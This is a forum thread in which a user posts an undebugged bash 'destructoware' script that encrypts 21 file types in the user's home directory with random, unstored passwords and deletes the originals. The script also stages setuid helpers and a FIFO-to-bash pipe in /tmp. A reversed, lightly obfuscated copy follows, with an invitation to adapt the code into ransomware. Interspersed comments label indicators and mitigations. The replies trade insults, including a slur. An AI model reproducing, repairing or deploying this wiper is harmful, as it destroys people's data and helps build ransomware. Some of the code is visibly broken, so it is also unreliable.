Vandalize loonix.
-
2022-09-13 at 5:03 AM UTC
I felt like writing a shell script, so I did. I didn't debug it, however, so it might not work 100%. Even so, I wouldn't risk running this like YOLO.
#!/bin/bash
# Review note (defensive): this listing is a destructive file-encryption
# script. The associative array below holds 21 filename glob patterns
# (source code, documents, databases, archives, images, video) from which
# the script picks what to target.
declare -A dword
dword[0]="*.c"
dword[1]="*.py"
dword[2]="*.txt"
dword[3]="*.doc"
dword[4]="*.sh"
dword[5]="*.php"
dword[6]="*.sqlite"
dword[7]="*.sql"
dword[8]="*.rar"
dword[9]="*.zip"
dword[10]="*.7z"
dword[11]="*.rb"
dword[12]="*.js"
dword[13]="*.h"
dword[14]="*.cpp"
dword[15]="*.png"
dword[16]="*.jpeg"
dword[17]="*.mov"
dword[18]="*.mpeg"
dword[19]="*.avi"
dword[20]="*.mp4"
# The working directory becomes /tmp; relative file names used later in the
# script (for example `cys`) are resolved against the current directory.
cd /tmp
# do_it: selects one pattern from dword using $RANDOM modulo 20 (written in
# the legacy $[ ... ] arithmetic form), then calls crypt on $HOME with that
# pattern inside a `while true` loop; no exit condition is visible here.
# Defensive note: the target is the invoking user's own home directory, so
# the data loss described in crypt needs no elevated privileges.
do_it(){
rand=$[ $RANDOM % 20 ] && rdf=${dword[$rand]}
while true ; do
crypt $HOME $rdf
done
};
# Main Crypto Operation
# crypt DIR PATTERN: for file names read NUL-delimited from `find`, writes an
# encrypted copy "<name>.enc" with `openssl enc` (AES-256, PBKDF2 key
# derivation) and then deletes the original with `rm -rf`.
# Defensive notes:
#  - The password is generated per file and held only in the shell variable
#    `pword`; the echo lines that would print it are commented out and
#    nothing in this listing stores or transmits it. The .enc output is
#    therefore effectively unrecoverable: this behaves as a wiper, not as
#    ransomware with a recoverable key.
#  - Behaviour worth alerting on: many short-lived `openssl enc` processes
#    touching a user's home directory, and *.enc files appearing while the
#    files they were derived from disappear.
#  - Recovery depends on backups or snapshots that the affected user account
#    cannot modify.
crypt(){
dir=$1
file=$2
while IFS= read -d $'\0' -r file ; do
file_list=("${file_list[@]}" "$file")
for $file in $file_list
do
pword=''
# 16 alphanumeric characters drawn from /dev/random.
pword=$(cat /dev/random | LC_ALL=C tr -dc 'a-zA-Z0-9' | head -c16)
openssl enc -aes256 -e -k $pword -pbkdf2 -in $file -out $file.enc
# The original is removed without checking the exit status of openssl.
rm -rf $file
#echo -e $pword
#echo -e $file
done;
done < <( find $dir/$file -name -print0 );
};
# Fallback
# write_buf_B: writes a here-document holding a copy of the crypt loop to
# $TMP/crypt.src, then hands over to write_buf_A.
# Defensive note: the drop location depends on the TMP environment variable;
# the file name `crypt.src` is a usable indicator when hunting for this
# script on a host.
write_buf_B(){
cat << EOF > $TMP/crypt.src
#!/usr/bin/env bash
dir=$1
file=$2
while IFS= read -d $'\0' -r file ; do
file_list=("${file_list[@]}" "$file")
for $file in $file_list
do
pword=''
pword=$(cat /dev/random | LC_ALL=C tr -dc 'a-zA-Z0-9' | head -c16)
openssl enc -aes256 -e -k $pword -pbkdf2 -in $file -out $file.enc
rm -rf $file
#echo -e $pword
#echo -e $file
done;
done < <( find $dir/$file -name -print0 );
EOF
write_buf_A()
};
# write_buf_A: writes a second helper script to /tmp/cys, applies
# `chmod +xs` (execute plus setuid/setgid bits) to `cys`, then loops forever
# invoking it, with `exec /tmp/crypt.src $HOME <pattern>` as the alternative
# branch. The helper's here-document defines buff_ops, which creates a named
# pipe `u_dev` with mknod and connects it to /bin/bash.
# Defensive notes:
#  - Indicators: /tmp/cys, crypt.src, a FIFO named u_dev, and setuid/setgid
#    mode bits on files under /tmp.
#  - Mounting /tmp with noexec,nosuid and auditing chmod calls that set
#    setuid/setgid bits both restrict and expose this staging step.
#  - NOTE(review): when set by an unprivileged user these bits refer to that
#    user's own uid/gid; confirm file ownership during triage.
write_buf_A(){
cat << EOF > /tmp/cys
#!/usr/bin/env bash
umask -p 700 2>/dev/null
buff_ops()
{
cmd=$1
arg=$2
rm -r u_dev; mknod u_dev p && cat < `read -t (${cmd $'\0' arg})` 0<u_dev | /bin/bash 1>u_dev
};
buff_ops 'chmod +xs ' 'crypt.src ''
EOF
chmod +xs cys
rand=$[ $RANDOM % 20 ] && rdf=${dword[$rand]}
while true ; do
./cys ' exec /tmp/crypt.src ' '$HOME $rdf ' || exec /tmp/crypt.src $HOME $rdf
done
};
# Init Ops
# When `which openssl` prints nothing, this section downloads the OpenSSL
# 1.1.1k source tarball from openssl.org with curl, unpacks it, and runs
# Configure and make; the Configure line names /usr/bin/afl-gcc.
# Defensive note: an unexpected source download followed by a compiler run
# started from /tmp is a detection opportunity in its own right (egress
# logs, process ancestry), and it precedes any file damage.
if [[ $(which openssl) == '' ]]; then
OPENSSL_VERSION='1.1.1k'
# Download
curl -LO https://www.openssl.org/source/openssl-${OPENSSL_VERSION}.tar.gz
tar zxvf openssl-${OPENSSL_VERSION}.tar.gz
cd openssl-${OPENSSL_VERSION}
# Configure
CC=/usr/bin/afl-gcc -static ./Configure no-shared linux-x86_64
# Build
make
fi
umask -p 0700 2>/dev/null
# Entry point: the do_it path, with write_buf_B named as the fallback.
do_it() || write_buf_B()
# stderr of the helper is discarded, so its failures produce no console output.
chmod +xs cys && ./cys 2>/dev/null
Feel free to adapt from destructoware to ransomware, if you have the ability and the motivation to do so. I even put some light obfuscation on it for you.
#!/usr/bin/env bash
${!#} <<< "$(rev <<<'}#!{$|")"}~~fI{$" s% ftnirp;'"'"'
LLUN/VED/>2 SYC/. && SYC SX+ DOMHC
)(b_FUB_ETIRW || )(TI_OD
LLUN/VED/>2 0070 P- KSAMU
PMT/ DC
IF
EKAM
DLIUb #
46_68X-XUNIL DERAHS-ON ERUGIFNOc/. CITATS- CCG-LFA/NIB/RSU/=cc
ERUGIFNOc #
}noisrev_lssnepo{$-LSSNEPO DC
ZG.RAT.}noisrev_lssnepo{$-LSSNEPO FVXZ RAT
ZG.RAT.}noisrev_lssnepo{$-LSSNEPO/ECRUOS/GRO.LSSNEPO.WWW//:SPTTH ol- LRUC
DAOLNWOd #
'"'"'"'"'"'"'"'"'K1.1.1'"'"'"'"'"'"'"'"'=noisrev_lssnepo
NEHT ;]] '"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"' == )LSSNEPO HCIHW($ [[ FI
SPo TINi #
;}
ENOD
FDR$ emoh$ CRS.TPYRC/pmt$ CEXE
OD ; EURT ELIHW
}]DNAR$[DROWD{$=FDR && ] 02 % modnar$ [$=DNAR
SYC SX+ DOMHC
foe
'"'"'"'"'"'"'"'"'LLUN/VED/>2 0TNIRP- W+O- MREP- DNIF($ emoh$ CRS.TPYRC/.'"'"'"'"'"'"'"'"' '"'"'"'"'"'"'"'"' CEXE'"'"'"'"'"'"'"'"' SPO_FFUB
'"'"'"'"'"'"'"'"' CRS.TPYRC'"'"'"'"'"'"'"'"' '"'"'"'"'"'"'"'"' SX+ DOMHC'"'"'"'"'"'"'"'"' SPO_FFUB
;}
VED_U>1 HSAB/NIB/ | VED_U<0 `)}GRA '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ DMC{$( T- DAER` < TAC && P VED_U DONKM ;VED_U R- MR
2$=GRA
1$=DMC
{
)(SPO_FFUB
LLUN/VED/>2 007 P- KSAMU
HSAB VNE/NIB/RSU/!#
SYC/pmt$ > foe << TAC
{)(a_FUB_ETIRW
;}
)(a_FUB_ETIRW
foe
;) 0TNIRP- EMAN- ELIF$/RID$ DNIF (< < ENOD
;ENOD
ELIF$ E- OHCE
DROWP$ E- OHCE
ELIF$ FR- MR
CNE.ELIF$ TUO- ELIF$ NI- 2FDKBP- DROWP$ K- E- 652SEA- CNE LSSNEPO
)61C- DAEH | '"'"'"'"'"'"'"'"'9-0z-aZ-A'"'"'"'"'"'"'"'"' CD- RT c=lla_cl | MODNAR/VED/ TAC($=DROWP
'"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"'=DROWP
OD
TSIL_ELIF$ NI ELIF$ ROF
)"ELIF$" "}]@[TSIL_ELIF{$"(=TSIL_ELIF
OD ; ELIF R- '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ D- DAER =sfi ELIHW
2$=ELIF
1$=RID
HSAB VNE/NIB/RSU/!#
CRS.TPYRC/pmt$ > foe << TAC
{)(b_FUB_ETIRW
KCABLLAf #
;}
;) 0TNIRP- EMAN- ELIF$/RID$ DNIF (< < ENOD
;ENOD
ELIF$ E- OHCE#
DROWP$ E- OHCE#
ELIF$ FR- MR
CNE.ELIF$ TUO- ELIF$ NI- 2FDKBP- DROWP$ K- E- 652SEA- CNE LSSNEPO
)61C- DAEH | '"'"'"'"'"'"'"'"'9-0z-aZ-A'"'"'"'"'"'"'"'"' CD- RT c=lla_cl | MODNAR/VED/ TAC($=DROWP
'"'"'"'"'"'"'"'"''"'"'"'"'"'"'"'"'=DROWP
OD
TSIL_ELIF$ NI ELIF$ ROF
)"ELIF$" "}]@[TSIL_ELIF{$"(=TSIL_ELIF
OD ; ELIF R- '"'"'"'"'"'"'"'"'0\'"'"'"'"'"'"'"'"'$ D- DAER =sfi ELIHW
2$=ELIF
1$=RID
{)(TPYRC
NOITAREPo OTPYRc NIAm #
;}
ENOD
FDR$ emoh$ TPYRC
OD ; EURT ELIHW
}]DNAR$[DROWD{$=FDR && ] 02 % modnar$ [$=DNAR
{)(TI_OD
PMT/ DC
"4PM.*"=]02[DROWD
"IVA.*"=]91[DROWD
"GEPM.*"=]81[DROWD
"VOM.*"=]71[DROWD
"GEPJ.*"=]61[DROWD
"GNP.*"=]51[DROWD
"PPC.*"=]41[DROWD
"H.*"=]31[DROWD
"SJ.*"=]21[DROWD
"BR.*"=]11[DROWD
"Z7.*"=]01[DROWD
"PIZ.*"=]9[DROWD
"RAR.*"=]8[DROWD
"LQS.*"=]7[DROWD
"ETILQS.*"=]6[DROWD
"PHP.*"=]5[DROWD
"HS.*"=]4[DROWD
"COD.*"=]3[DROWD
"TXT.*"=]2[DROWD
"YP.*"=]1[DROWD
"C.*"=]0[DROWD
DROWD a- ERALCED
'"'"'=fI($" s% ftnirp';)"
Bona Fortuna. -
2022-09-30 at 12:20 PM UTCNo answers huh, i guess all i can conclude is that i am a level 97 Cyber Security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.
-
2022-09-30 at 12:45 PM UTCwats 4PM.*"=]02[DROWD
"IVA.*"=]91[DROWD
"GEPM.*"=]81[DROWD
"VOM.*"=]71[DROWD
"GEPJ.*"=]61[DROWD
"GNP.*"=]51[DROWD
"PPC.*"=]41[DROWD
"H.*"=]31[DROWD
"SJ.*"=]21[DROWD
"BR.*"=]11[DROWD
"Z7.*"=]01[DROWD
"PIZ.*"=]9[DROWD
"RAR.*"=]8[DROWD
"LQS.*"=]7[DROWD
"ETILQS.*"=]6[DROWD
"PHP.*"=]5[DROWD
"HS.*"=]4[DROWD
"COD.*"=]3[DROWD
"TXT.*"=]2[DROWD
"YP.*"=]1[DROWD
"C.*"=]0[DROWD -
2022-09-30 at 1:50 PM UTC2$=ELIF
1$=RID
{)(TPYRC
NOITAREPo OTPYRc NIAm #
what this do -
2022-09-30 at 1:59 PM UTC
Originally posted by Sophie No answers huh, i guess all i can conclude is that i am a level 97 Cyber Security wizard and no one is even close to my level and therefore has nothing to contribute. Which is kind of unfortunate.
you don't have a single clue what the fuck you're doing sophie, that has been well established.
there's an error in it, it's really fucking obvious. one of the container format file types will never be encrypted, tell me which one and why.
i'll even give you a clue, because i know you'll need it - it's a really common class of error. -
2022-09-30 at 2:15 PM UTCSuck my dick. Did you read the OP? I didn't debug it. Because i didn't feel like it. What's with you and getting big mad at me for posting half assed stuff and claiming God mode, for the lulz.
By the way, do you honestly think i care if it doesn't encrypt something? I just shotgunned a bunch of file formats. Do you really think i run Ransomware Ops or any kind of Ops with the content i post here? Lmao. -
2022-09-30 at 2:20 PM UTCHey troon, did you study Computer Science at University? Is that the reason you're so uptight about this. Even if you work in Cyber Security wanna bet i make more money than you?
-
2022-09-30 at 2:20 PM UTC
-
2022-09-30 at 2:22 PM UTC
-
2022-09-30 at 2:25 PM UTCTroon showing who's the real coder
-
2022-09-30 at 2:26 PM UTCI have a distinct way of writing Bash. If you can find the Github account that has the same style as me, to the letter. I will login to github, and make a 'troon is silly' repo. Because the Github account in question will be mine.
-
2022-09-30 at 2:27 PM UTC
-
2022-09-30 at 2:43 PM UTC
-
2022-09-30 at 2:46 PM UTC
-
2022-09-30 at 2:48 PM UTCTroon is the real tech master here clearly.
-
2022-09-30 at 2:56 PM UTC
-
2022-09-30 at 2:57 PM UTCLol Sophie the copy 'n paste master getting schooled by Troon.
-
2022-09-30 at 3 PM UTCTroon is still salty from that one thread where MLT dropped by to back my work up. Troon has been a fan of TeamPoison since he was a small boy.
-
2022-09-30 at 4:11 PM UTC